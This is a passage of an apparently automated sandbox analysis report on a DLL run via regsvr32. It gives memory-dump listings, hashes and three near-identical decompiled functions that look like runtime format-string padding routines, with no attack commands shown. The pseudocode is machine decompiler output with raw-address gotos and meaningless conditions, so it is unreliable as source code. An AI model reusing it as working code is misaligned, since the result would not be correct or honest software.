                                                                      0x180019c59
                                                                      0x180019c64
                                                                      0x180019c6d
                                                                      0x180019c72
                                                                      0x180019c74
                                                                      0x180019c77
                                                                      0x180019c7a
                                                                      0x180019c81
                                                                      0x180019c83
                                                                      0x180019c8a
                                                                      0x180019c97
                                                                      0x180019c9e
                                                                      0x180019ca6
                                                                      0x180019ca8
                                                                      0x180019cac
                                                                      0x180019cb0
                                                                      0x180019cb9
                                                                      0x180019cbe
                                                                      0x180019cc3
                                                                      0x180019cc7
                                                                      0x180019cd4
                                                                      0x180019cdf
                                                                      0x180019ce8
                                                                      0x180019cea
                                                                      0x180019cf3
                                                                      0x180019cf6
                                                                      0x180019d13

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b712fc738f043a3b20be4889ad894808262bdcdfb7f1f2e76ba7c98c444e8c84
                                                                      • Instruction ID: 94cf066b7bfdd288a4b55d0f530e0d3a1d908a8f29663b35a196de8e6f036dcd
                                                                      • Opcode Fuzzy Hash: b712fc738f043a3b20be4889ad894808262bdcdfb7f1f2e76ba7c98c444e8c84
                                                                      • Instruction Fuzzy Hash: 31519672105A8886FBEB8FA8C1553E837A0F74D7DCF158215FA8A076D9CF25CA49C784
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00000001180019D14(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x80019df3;
                                                                      				if (_t110 == 0) goto 0x80019d6d;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x80019e47;
                                                                      				if (_t111 == 0) goto 0x80019dc3;
                                                                      				if (_t111 == 0) goto 0x80019d94;
                                                                      				if (_t111 == 0) goto 0x80019e47;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x80019e13;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x80019e70;
                                                                      				E00000001180022E08( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x80019e75;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x80019db9;
                                                                      				_t70 = E000000011800229E4( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x80019e75;
                                                                      				E00000001180022AF0(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x80019e75;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x80019de9;
                                                                      				_t74 = E000000011800227D0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x80019e75;
                                                                      				E000000011800228DC(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x80019e75;
                                                                      				if (_t115 == 0) goto 0x80019d6d;
                                                                      				if (_t115 == 0) goto 0x80019d6d;
                                                                      				if (_t115 == 0) goto 0x80019d6d;
                                                                      				goto 0x80019d5b;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x80019f2b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x80019e69;
                                                                      				_t80 = E00000001180022BF8( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x80019e75;
                                                                      				_t81 = E00000001180022D00(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x80019e75;
                                                                      				E00000001180022F10(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x80019e40;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x80019e8f;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x80019f29;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x80019ead;
                                                                      				if (_t153 >= 0) goto 0x80019ead;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x80019ebc;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x80019ed3;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E00000001180023018(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x80019edc;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x80019ef5;
                                                                      				E0000000118002320C(0, _t132, _t154, _t162);
                                                                      				goto 0x80019efc;
                                                                      				E00000001180023294(__esi, _t132, _t162);
                                                                      				if (0 == 0) goto 0x80019f29;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x80019f1a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x80019f29;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x180019d14
                                                                      0x180019d19
                                                                      0x180019d1e
                                                                      0x180019d2f
                                                                      0x180019d32
                                                                      0x180019d35
                                                                      0x180019d38
                                                                      0x180019d3e
                                                                      0x180019d41
                                                                      0x180019d47
                                                                      0x180019d49
                                                                      0x180019d4b
                                                                      0x180019d54
                                                                      0x180019d59
                                                                      0x180019d5e
                                                                      0x180019d67
                                                                      0x180019d74
                                                                      0x180019d84
                                                                      0x180019d8a
                                                                      0x180019d8f
                                                                      0x180019d9b
                                                                      0x180019dad
                                                                      0x180019daf
                                                                      0x180019db4
                                                                      0x180019db9
                                                                      0x180019dbe
                                                                      0x180019dca
                                                                      0x180019dda
                                                                      0x180019ddd
                                                                      0x180019ddf
                                                                      0x180019de4
                                                                      0x180019de9
                                                                      0x180019dee
                                                                      0x180019df6
                                                                      0x180019dff
                                                                      0x180019e08
                                                                      0x180019e0e
                                                                      0x180019e13
                                                                      0x180019e17
                                                                      0x180019e1a
                                                                      0x180019e21
                                                                      0x180019e25
                                                                      0x180019e30
                                                                      0x180019e35
                                                                      0x180019e3b
                                                                      0x180019e42
                                                                      0x180019e4e
                                                                      0x180019e60
                                                                      0x180019e62
                                                                      0x180019e67
                                                                      0x180019e69
                                                                      0x180019e6e
                                                                      0x180019e70
                                                                      0x180019e77
                                                                      0x180019e80
                                                                      0x180019e89
                                                                      0x180019e94
                                                                      0x180019e9d
                                                                      0x180019ea2
                                                                      0x180019ea4
                                                                      0x180019ea7
                                                                      0x180019eaa
                                                                      0x180019eb1
                                                                      0x180019eb3
                                                                      0x180019eba
                                                                      0x180019ec7
                                                                      0x180019ece
                                                                      0x180019ed6
                                                                      0x180019ed8
                                                                      0x180019edc
                                                                      0x180019ee0
                                                                      0x180019ee9
                                                                      0x180019eee
                                                                      0x180019ef3
                                                                      0x180019ef7
                                                                      0x180019f04
                                                                      0x180019f0f
                                                                      0x180019f18
                                                                      0x180019f1a
                                                                      0x180019f23
                                                                      0x180019f26
                                                                      0x180019f43

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ee29a1846d14c5142aa145a31d6d304fe98f68d9df9237f7f3c0d838472a243
                                                                      • Instruction ID: be1ead9c22d83ed49f43d41660af7ad90f2b416aa6fc4845e40367117b6f1c6f
                                                                      • Opcode Fuzzy Hash: 4ee29a1846d14c5142aa145a31d6d304fe98f68d9df9237f7f3c0d838472a243
                                                                      • Instruction Fuzzy Hash: 2451B632101A8892F7BBDFA8D0553E837A0E70DBDCF158215FA5A0B6D9CF25CA4AC741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001BDDC(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001bebb;
                                                                      				if (_t110 == 0) goto 0x8001be35;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001bf0f;
                                                                      				if (_t111 == 0) goto 0x8001be8b;
                                                                      				if (_t111 == 0) goto 0x8001be5c;
                                                                      				if (_t111 == 0) goto 0x8001bf0f;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001bedb;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001bf38;
                                                                      				E00000001180024F6C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001bf3d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001be81;
                                                                      				_t70 = E00000001180024B48( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001bf3d;
                                                                      				E00000001180024C54(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001bf3d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001beb1;
                                                                      				_t74 = E00000001180024934( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001bf3d;
                                                                      				E00000001180024A40(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001bf3d;
                                                                      				if (_t115 == 0) goto 0x8001be35;
                                                                      				if (_t115 == 0) goto 0x8001be35;
                                                                      				if (_t115 == 0) goto 0x8001be35;
                                                                      				goto 0x8001be23;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001bff3;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001bf31;
                                                                      				_t80 = E00000001180024D5C( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001bf3d;
                                                                      				_t81 = E00000001180024E64(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001bf3d;
                                                                      				E00000001180025074(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001bf08;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001bf57;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001bff1;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001bf75;
                                                                      				if (_t153 >= 0) goto 0x8001bf75;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001bf84;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001bf9b;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E00000001180023018(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001bfa4;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x8001bfbd;
                                                                      				E0000000118002517C(0, _t132, _t154);
                                                                      				goto 0x8001bfc4;
                                                                      				E00000001180025220(__esi, _t132);
                                                                      				if (0 == 0) goto 0x8001bff1;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001bfe2;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001bff1;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001bddc
                                                                      0x18001bde1
                                                                      0x18001bde6
                                                                      0x18001bdf7
                                                                      0x18001bdfa
                                                                      0x18001bdfd
                                                                      0x18001be00
                                                                      0x18001be06
                                                                      0x18001be09
                                                                      0x18001be0f
                                                                      0x18001be11
                                                                      0x18001be13
                                                                      0x18001be1c
                                                                      0x18001be21
                                                                      0x18001be26
                                                                      0x18001be2f
                                                                      0x18001be3c
                                                                      0x18001be4c
                                                                      0x18001be52
                                                                      0x18001be57
                                                                      0x18001be63
                                                                      0x18001be75
                                                                      0x18001be77
                                                                      0x18001be7c
                                                                      0x18001be81
                                                                      0x18001be86
                                                                      0x18001be92
                                                                      0x18001bea2
                                                                      0x18001bea5
                                                                      0x18001bea7
                                                                      0x18001beac
                                                                      0x18001beb1
                                                                      0x18001beb6
                                                                      0x18001bebe
                                                                      0x18001bec7
                                                                      0x18001bed0
                                                                      0x18001bed6
                                                                      0x18001bedb
                                                                      0x18001bedf
                                                                      0x18001bee2
                                                                      0x18001bee9
                                                                      0x18001beed
                                                                      0x18001bef8
                                                                      0x18001befd
                                                                      0x18001bf03
                                                                      0x18001bf0a
                                                                      0x18001bf16
                                                                      0x18001bf28
                                                                      0x18001bf2a
                                                                      0x18001bf2f
                                                                      0x18001bf31
                                                                      0x18001bf36
                                                                      0x18001bf38
                                                                      0x18001bf3f
                                                                      0x18001bf48
                                                                      0x18001bf51
                                                                      0x18001bf5c
                                                                      0x18001bf65
                                                                      0x18001bf6a
                                                                      0x18001bf6c
                                                                      0x18001bf6f
                                                                      0x18001bf72
                                                                      0x18001bf79
                                                                      0x18001bf7b
                                                                      0x18001bf82
                                                                      0x18001bf8f
                                                                      0x18001bf96
                                                                      0x18001bf9e
                                                                      0x18001bfa0
                                                                      0x18001bfa4
                                                                      0x18001bfa8
                                                                      0x18001bfb1
                                                                      0x18001bfb6
                                                                      0x18001bfbb
                                                                      0x18001bfbf
                                                                      0x18001bfcc
                                                                      0x18001bfd7
                                                                      0x18001bfe0
                                                                      0x18001bfe2
                                                                      0x18001bfeb
                                                                      0x18001bfee
                                                                      0x18001c00b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c58d73ff292e417de90e5df23d470c2eb99192711c1254779313b07398f103ce
                                                                      • Instruction ID: 9010292fff365b08c80191034a09f30314a6f64fad596eed613a68898c02b247
                                                                      • Opcode Fuzzy Hash: c58d73ff292e417de90e5df23d470c2eb99192711c1254779313b07398f103ce
                                                                      • Instruction Fuzzy Hash: 69519532110A4886FBA79E29C4543EC27A4F74D7DCF158229FA458B7D9CF35CA4ACB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00000001180019F44(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001a023;
                                                                      				if (_t110 == 0) goto 0x80019f9d;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001a077;
                                                                      				if (_t111 == 0) goto 0x80019ff3;
                                                                      				if (_t111 == 0) goto 0x80019fc4;
                                                                      				if (_t111 == 0) goto 0x8001a077;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001a043;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001a0a0;
                                                                      				E00000001180022E08( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001a0a5;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x80019fe9;
                                                                      				_t70 = E000000011800229E4( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001a0a5;
                                                                      				E00000001180022AF0(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001a0a5;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001a019;
                                                                      				_t74 = E000000011800227D0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001a0a5;
                                                                      				E000000011800228DC(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001a0a5;
                                                                      				if (_t115 == 0) goto 0x80019f9d;
                                                                      				if (_t115 == 0) goto 0x80019f9d;
                                                                      				if (_t115 == 0) goto 0x80019f9d;
                                                                      				goto 0x80019f8b;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001a15b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001a099;
                                                                      				_t80 = E00000001180022BF8( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001a0a5;
                                                                      				_t81 = E00000001180022D00(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001a0a5;
                                                                      				E00000001180022F10(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001a070;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001a0bf;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001a159;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001a0dd;
                                                                      				if (_t153 >= 0) goto 0x8001a0dd;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001a0ec;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001a103;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E00000001180023018(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001a10c;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001a125;
                                                                      				E0000000118002331C(_t132, _t154);
                                                                      				goto 0x8001a12c;
                                                                      				E000000011800233DC(__esi, _t132, _t154, _t162);
                                                                      				if (0 == 0) goto 0x8001a159;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001a14a;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001a159;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x180019f44
                                                                      0x180019f49
                                                                      0x180019f4e
                                                                      0x180019f5f
                                                                      0x180019f62
                                                                      0x180019f65
                                                                      0x180019f68
                                                                      0x180019f6e
                                                                      0x180019f71
                                                                      0x180019f77
                                                                      0x180019f79
                                                                      0x180019f7b
                                                                      0x180019f84
                                                                      0x180019f89
                                                                      0x180019f8e
                                                                      0x180019f97
                                                                      0x180019fa4
                                                                      0x180019fb4
                                                                      0x180019fba
                                                                      0x180019fbf
                                                                      0x180019fcb
                                                                      0x180019fdd
                                                                      0x180019fdf
                                                                      0x180019fe4
                                                                      0x180019fe9
                                                                      0x180019fee
                                                                      0x180019ffa
                                                                      0x18001a00a
                                                                      0x18001a00d
                                                                      0x18001a00f
                                                                      0x18001a014
                                                                      0x18001a019
                                                                      0x18001a01e
                                                                      0x18001a026
                                                                      0x18001a02f
                                                                      0x18001a038
                                                                      0x18001a03e
                                                                      0x18001a043
                                                                      0x18001a047
                                                                      0x18001a04a
                                                                      0x18001a051
                                                                      0x18001a055
                                                                      0x18001a060
                                                                      0x18001a065
                                                                      0x18001a06b
                                                                      0x18001a072
                                                                      0x18001a07e
                                                                      0x18001a090
                                                                      0x18001a092
                                                                      0x18001a097
                                                                      0x18001a099
                                                                      0x18001a09e
                                                                      0x18001a0a0
                                                                      0x18001a0a7
                                                                      0x18001a0b0
                                                                      0x18001a0b9
                                                                      0x18001a0c4
                                                                      0x18001a0cd
                                                                      0x18001a0d2
                                                                      0x18001a0d4
                                                                      0x18001a0d7
                                                                      0x18001a0da
                                                                      0x18001a0e1
                                                                      0x18001a0e3
                                                                      0x18001a0ea
                                                                      0x18001a0f7
                                                                      0x18001a0fe
                                                                      0x18001a106
                                                                      0x18001a108
                                                                      0x18001a10c
                                                                      0x18001a110
                                                                      0x18001a119
                                                                      0x18001a11e
                                                                      0x18001a123
                                                                      0x18001a127
                                                                      0x18001a134
                                                                      0x18001a13f
                                                                      0x18001a148
                                                                      0x18001a14a
                                                                      0x18001a153
                                                                      0x18001a156
                                                                      0x18001a173

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
